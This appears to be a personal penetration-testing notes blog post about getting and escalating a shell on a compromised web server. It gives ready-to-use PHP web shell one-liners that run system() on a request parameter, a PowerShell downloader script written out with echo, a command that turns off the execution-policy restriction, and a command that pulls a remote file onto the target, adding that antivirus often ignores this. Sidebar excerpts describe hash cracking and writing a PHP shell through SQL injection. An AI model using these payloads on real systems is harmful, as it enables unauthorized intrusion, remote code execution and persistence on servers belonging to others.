Skip to main content

From SHELL to POWERSHELL

Just to keep for my notes and reference. Because sometime hard to recall back on #HowTo

See 'clam' for more and `bash' for a shell script!


            ___
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\\!!!// .'_.'
       `.`.\\|//.'.'
        |`._`n'_.'|  hjw
        "----^----"

Ok, let's assume that we are able to inject some malicious payload/code like using phpMyAdmin or whatever low-hanging fruits on the target SQLi, RCE or whatever.

1. For PHP these are the useful code:
========
PHP Info
========

<? phpinfo(); ?>

This might be useful for us to identify file path and default folder etc.

================
Simple PHP Backdoor
================

<?php system($_GET['cmd']); ?>

or

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

This one the most 'clean' version. Both of the code are in one line, we can simply append it into another filename that we like.

2. In order for us to perform the privilege escalation attack its depend on the target platform. Either the target is running on Windows or Linux. These two type of architecture have a different method to do it.

If the target are running Windows we can use powershell. As we know most of the Windows operating system by default have the powershell capabilities. Good thing about powershell some of the Anti-Virus/Malware are ignore if any command are execute.

As we know Windows does not have a wget or curl command to download from any or other external resources that we wanted to. To do that, with the existing shell that we append earlier, we can use echo command to write a new payload in order for us to use it.

First we create a new file called download.ps1:
================
Copy & Execute This
================

echo param($url, $filename) > download.ps1
echo $client = new-object System.Net.WebClient >> download.ps1
echo $client.DownloadFile( $url, $filename); >> download.ps1

The expected output of file should place the one that we echo line-by-line like these;

$ type download.ps1

param($url, $filename)
$client = new-object System.Net.WebClient
$client.DownloadFile( $url, $filename);

Next run this command:

$ powershell Set-ExecutionPolicy Unrestricted

This is to make sure that we had no restriction while we run the script.

$ powershell -ExecutionPolicy RemoteSigned -File "download.ps1" "http://somewhere.com/filename.ext" "C:\Windows\Temp\filename.ext"

The last command that we wanted to run. Make sure that both URL and file path that are set right before we execute it.

Another thing that I been wondering about these powershell is there any Webshell for Powershell? Yes we have it! While do some Google I found --> this  "Antak-WebShell" It is written in ASP.Net and its not support PHP :( But if you get lucky, some of Microsoft web server are running both PHP & IIS this is where we can use this.


Since we have this nice WebShell we can rely on another tools like Empire, PowerSploit or Nishang for post exploitation.

As for the conclusion, the step-by-step walkthrough may be in pain or you might get stuck on while working on this. Maybe you have a better technique to simplyfied it? Anyway, good luck with spawning the $HELL Cheers!!!



Comments

Popular posts from this blog

Create a session & restore abort/interrupted session in John The Ripper!

Been busy with report writing. Just wanna put some of these command and technique on how to restore interrupted session or aborted session in John The Ripper. 1. First step crack the hash with these commands : john --session=test --format=raw-sha --incremental=rockyou test.txt 2. To restore the abort /interrupted session that you wanted to resume just run these commands : john --restore=test Check the "test.log" Note:  Make sure that these file are not delete " .rec " and " .log " files if the file is deleted or missing it wont work. That's all happy cracking!

iOS - Convert .app to .ipa

While doing a iOS Security Testing, I wondered how do we convert .app into .ipa. So basically here are the structure of .ipa files. 1. First, SSH in your iPhone (Jailbroken). 2. Download the .app folder via scp  3. Copy the .app folder into a folder called Payload. 4. Compress it with .zip extension using any compression software. 5. Change the extension from file.zip to file.ipa. That’s it. Now you can use these .ipa files to install the app into your iPhone.

SQLiiiii

This is an re-post from an old archive ... From MySQL documentation : "The SELECT ... INTO OUTFILE 'file_name' form of SELECT writes the selected rows to a file. The file is created on the server host, so you must have the FILE privilege to use this syntax. file_name cannot be an existing file, which among other things prevents files such as /etc/passwd and database tables from being destroyed. As of MySQL 5.0.19, the character_set_filesystem system variable controls the interpretation of the filename." The INTO OUTFILE operator can be used during sql injection exploiting to write php shell on remote host. Unfortunately (fortunately?) this is only possible in some (very) race conditions : mysql user must have the FILE privilege; the operator requires a "quoted" file pathname, so the web application should not escape/filter them; httpd and mysql should be installed on the same machine, or (if you can) the file will be written on the dbms machi...